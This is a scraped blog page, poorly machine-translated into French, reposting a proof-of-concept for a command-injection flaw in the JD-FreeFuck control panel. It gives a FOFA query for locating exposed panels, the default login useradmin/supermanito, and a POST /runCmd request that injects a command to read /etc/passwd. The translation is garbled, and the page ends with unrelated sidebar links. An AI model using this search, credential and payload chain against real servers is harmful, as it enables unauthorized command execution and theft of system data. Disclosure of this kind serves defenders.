当前位置:网站首页>Vulnérabilité d'exécution de la commande de fond du panneau de commande JD - freefuck
Vulnérabilité d'exécution de la commande de fond du panneau de commande JD - freefuck
2022-04-23 18:05:00 【Solitaire et paresseux】
Description de la vulnérabilité
i
JD-FreeFuck Une vulnérabilité d'exécution de commandes de fond existe,Parce que le contenu n'a pas été filtré lors de l'exécution de la commande,Permet d'exécuter n'importe quelle commande,Serveur de contrôle Adresse du projet: https://github.com/meselson/JD-FreeFuck
Impact de la vulnérabilité
s
JD-FreeFuck
Cartographie spatiale
d
FOFA:title="Panneau de commande en laine Jingdong"
Replay of vulnerability
- La page de connexion après la visite est la suivante

- Numéro de compte par défaut
useradmin/supermanito
POST /runCmd HTTP/1.1
cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

Blogs personnels
Solitaire et paresseux:https://gylq.gitee.io/time
版权声明
本文为[Solitaire et paresseux]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231804351608.html
边栏推荐
- Correct opening method of option
- GDAL + ogr learning
- JS high frequency interview questions
- Timestamp to formatted date
- Go file operation
- Implementation of k8s redis one master multi slave dynamic capacity expansion
- Anchor location - how to set the distance between the anchor and the top of the page. The anchor is located and offset from the top
- Crawling mobile game website game details and comments (MQ + multithreading)
- 解决允许在postman中写入注释请求接口方法
- Amount input box, used for recharge and withdrawal
猜你喜欢
随机推荐
Cells in rust share variable pointers
Classes and objects
Crawler for querying nicknames and avatars based on qqwebapi
mysql自动启动设置用Systemctl start mysqld启动
2022江西储能技术展会,中国电池展,动力电池展,燃料电池展
I/O多路复用及其相关详解
Flash - Middleware
Basic usage of crawler requests
纳米技术+AI赋能蛋白质组学|珞米生命科技完成近千万美元融资
Nodejs安装
Multi thread crawling Marco Polo network supplier data
Qtablewidget usage explanation
Realization of consumer gray scale
Random number generation of C #
ROS package NMEA_ navsat_ Driver reads GPS and Beidou Positioning Information Notes
Summary of floating point double precision, single precision and half precision knowledge
positioner
C language implements memcpy, memset, strcpy, strncpy, StrCmp, strncmp and strlen
Docker installation MySQL
word frequency count



![C1 notes [task training part 2]](/img/10/48f7490a6c097f2b178ae948cb2c91.png)





